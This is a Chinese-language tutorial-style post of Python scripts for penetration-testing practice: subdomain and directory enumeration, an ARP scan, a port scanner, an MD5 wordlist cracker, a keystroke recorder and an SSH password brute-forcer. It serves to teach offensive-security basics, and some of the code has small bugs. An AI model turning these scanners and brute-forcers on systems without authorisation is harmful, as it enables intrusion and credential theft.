Python for Pentesters

还记得开始学习编程的C,虽然淡忘,但思想仍在。

子域名枚举

request库

import pyfiglet

import requests

import sys 

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

dir_path = ""

sub_list = open(dir_path, "r").read()

subdoms = sub_list.splitlines()

for sub in subdoms:

    sub_domains = f"http://{sub}.{sys.argv[1]}" 

    try:

        requests.get(sub_domains)

    except requests.ConnectionError:

        pass

    else:

        print("Valid domain: ",sub_domains)

目录枚举

还是requests

import requests

import sys

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

path = ''

sub_list = open(path,'r').read()

directories = sub_list.splitlines()

for dir in directories:

    dir_enum = f"http://{sys.argv[1]}/{dir}"

    r = requests.get(dir_enum)

    if r.status_code==404:

        pass

    else:

        print("Valid directory:" ,dir_enum)

网络扫描



from scapy.all import *

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

interface = "eth0"

ip_range = "10.10.X.X/24"

broadcastMac = "ff:ff:ff:ff:ff:ff"

packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) 

ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

for send,receive in ans:

        print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

端口扫描

socket编程https://www.cnblogs.com/-Lucky-/p/17039661.html

import sys

import socket

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

ip = sys.argv[1]

open_ports =[]

ports = range(1, 65535)

def probe_port(ip, port):

    result = 1

    try:

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        sock.settimeout(0.5)

        r = sock.connect_ex((ip, port))

        if r == 0:

            result = r

        sock.close()

    except Exception as e:

        pass

    return result

for port in ports:

    sys.stdout.flush()

    response = probe_port(ip, port)

    if response == 0:

        open_ports.append(port) 

print(f"Open Ports:{open_ports}")

文件下载器

Linux 系统上的 Wget 或 Windows 上的 Certutil 是下载文件的有用工具。

import requests

url = 'https://assets.tryhackme.com/img/THMlogo.png'

r = requests.get(url, allow_redirects=True)

open('THMlogo.png', 'wb').write(r.content)

import requests

url = 'https://download.sysinternals.com/files/PSTools.zip'

r = requests.get(url, allow_redirects=True)

open('PSTools.zip', 'wb').write(r.content)

hash破解

tools:john,hashcat

import hashlib

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

wordlist_location = str(input('Enter wordlist file location: '))

hash_input = str(input('Enter hash to be cracked: '))

with open(wordlist_location, 'r') as file:

    for line in file.readlines():

        print(line)

        hash_ob = hashlib.md5(line.strip().encode())

        hashed_pass = hash_ob.hexdigest()

        if hashed_pass == hash_input:

            print('Found cleartext password! ' + line.strip())

            exit(0)

键盘记录器

import keyboard

keys = keyboard.record(until ='ENTER')

keyboard.play(keys)

ssh暴力破解

tools:hydra

import paramiko

import sys

import os

target = str(input('Please enter target IP address: '))

username = str(input('Please enter username to bruteforce: '))

password_file = str(input('Please enter location of the password file: '))

def ssh_connect(password, code=0):

    ssh = paramiko.SSHClient()

    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:

        ssh.connect(target, port=22, username=username, password=password)

    except paramiko.AuthenticationException:

        code = 1

    ssh.close()

    return code

with open(password_file, 'r') as file:

    for line in file.readlines():

        password = line.strip()

        try:

            response = ssh_connect(password)

            if response == 0:

                 print('password found: '+ password)

                 exit(0)

            elif response == 1:

                print('no luck')

        except Exception as e:

            print(e)

        pass

input_file.close()

基于渗透的python的更多相关文章

  1. 基于SQL和PYTHON的数据库数据查询select语句

    #xiaodeng#python3#基于SQL和PYTHON的数据库数据查询语句import pymysql #1.基本用法cur.execute("select * from biao&q ...

  2. DIY一个基于树莓派和Python的无人机视觉跟踪系统

    DIY一个基于树莓派和Python的无人机视觉跟踪系统 无人机通过图传将航拍到的图像存储并实时传送回地面站差点儿已经是标配.假设想来点高级的--在无人机上直接处理拍摄的图像并实现自己主动控制要怎么实现 ...

  3. 基于七牛Python SDK写的一个批量下载脚本

    前言 上一篇基于七牛Python SDK写的一个同步脚本所写的脚本只支持上传,不支持文件下载. 虽然这个需求不太强烈,但有可能有人(在备份.迁移时)需要,而官方有没提供对应的工具,所以我就把这个功能也 ...

  4. 配置基于Vim的Python开发环境

    配置基于Vim的Python开发环境插件 Vundle YouCompleteMe NERDTree Vim-Jinja2-Syntax set nocompatible " be iMpr ...

  5. 基于Appium、Python的自动化测试

    基于Appium.Python的自动化测试环境部署和实践   第一章 导言 1.1 编制目的 该文档为选用Appium作为移动设备原生(Native).混合(Hybrid).移动Web(Mobile ...

  6. 如何在Windows系统上基于Sublime搭建Python的编译环境

    刚刚接触到Python,直接在计算机上编译时不能正确的运行,所以将一些有关编译环境调试的知识总结了一下. 环境搭建: Python在 windows系统上编译的时候可能会出现一些编译无法运行的情况,我 ...

  7. 基于Pycharm的Python开发环境配置

    基于Pycharm的Python开发环境配置 编辑于2020-11-18 Python安装 双击桌面的Python3.x安装包. 勾选Add to path. 方便起见,选择Install now.下 ...

  8. 基于Selenium2与Python自动化测试环境搭建

    简介: selenium 是一个web的自动化测试工具,不少学习功能自动化的同学开始首选selenium ,相因为它相比QTP有诸多有点: *  免费,也不用再为破解QTP而大伤脑筋 *  小巧,对于 ...

  9. 基于esky实现python应用的自动升级

    一.esky介绍 Esky is an auto-update framework for frozen Python applications. It provides a simple API t ...

  10. 基于ELK和Python搭建简单的监控告警系统

    Reference: https://www.jianshu.com/p/67e358dc065d 在做完支付系统后,我搭建了两套监控系统. 一套是点评的CAT,主要用于代码级的实时统计和历史统计以及 ...

随机推荐

  1. Unity绘制圆和缓动雷达图

    Unity绘制圆和缓动雷达图 之前在做UI模块的时候遇到过需要做雷达图的效果,所以简单复习了一下 关于网格绘制 我们都知道Unity绘制图形是通过Mesh网格添加顶点进行绘制,那么知道顶点信息后如何实 ...

  2. 在进行程序国际化时(Locale)遇到的问题

    Java程序国际化-Question 为了使程序能够个根据不同的国家/语言环境来输出不同的内容,通常需要把将需要输出的内容定义在资源文件中. 而在创建资源文件的过程中难免会出现问题,我遇到了在创建资源 ...

  3. 深入理解 python 虚拟机:pyc 文件结构

    深入理解 python 虚拟机:pyc 文件结构 在本篇文章当中主要给大家介绍一下 .py 文件在被编译之后对应的 pyc 文件结构,pyc 文件当中的一个核心内容就是 python 字节码. pyc ...

  4. SpringBoot中常见的各种初始化场景分析

    大家能区分出以下各种初始化适用的场景吗 ApplicationRunner,CommandLineRunner,BeanFactoryPostProcessor,InitializingBean,Be ...

  5. Flutter 下载篇 - 叁 | 网络库切换实践与思考

    前言 本文是关于使用flutter_download_manager下载功能的实践和探索.我们将基于flutter_download_manager的功能扩展,改造成自己想要的样子.在阅读本文之前,建 ...

  6. C++ 测试框架 GoogleTest 初学者入门篇 乙

    *以下内容为本人的学习笔记,如需要转载,请声明原文链接微信公众号「ENG八戒」https://mp.weixin.qq.com/s/aFeiOGO-N9O7Ab_8KJ2wxw 开发者虽然主要负责工程 ...

  7. day3 函数的定义和调用,练习编写简单的程序(记录3)

    0331.h #ifndef _0331_H #define _0331_H /************************************************************ ...

  8. pandas之读取文件

    当使用 Pandas 做数据分析的时,需要读取事先准备好的数据集,这是做数据分析的第一步.Panda 提供了多种读取数据的方法: read_csv() 用于读取文本文件 read_json() 用于读 ...

  9. Semantic Kernel 入门系列:🥑突破提示词的限制

    无尽的上下文 LLM的语言理解和掌握能力在知识内容的解读和总结方面提供了强大的能力. 但是由于训练数据本身来自于公共领域,也就注定了无法在一些小众或者私有的领域能够足够的好的应答. 因此如何给LLM ...

  10. JSON.parse 函数 (JavaScript)

    将 JavaScript 对象表示法 (JSON) 字符串转换为对象. 语法 参数 返回值 异常 以下示例使用 JSON.parse 将 JSON 字符串转换成对象. var jsontext = ' ...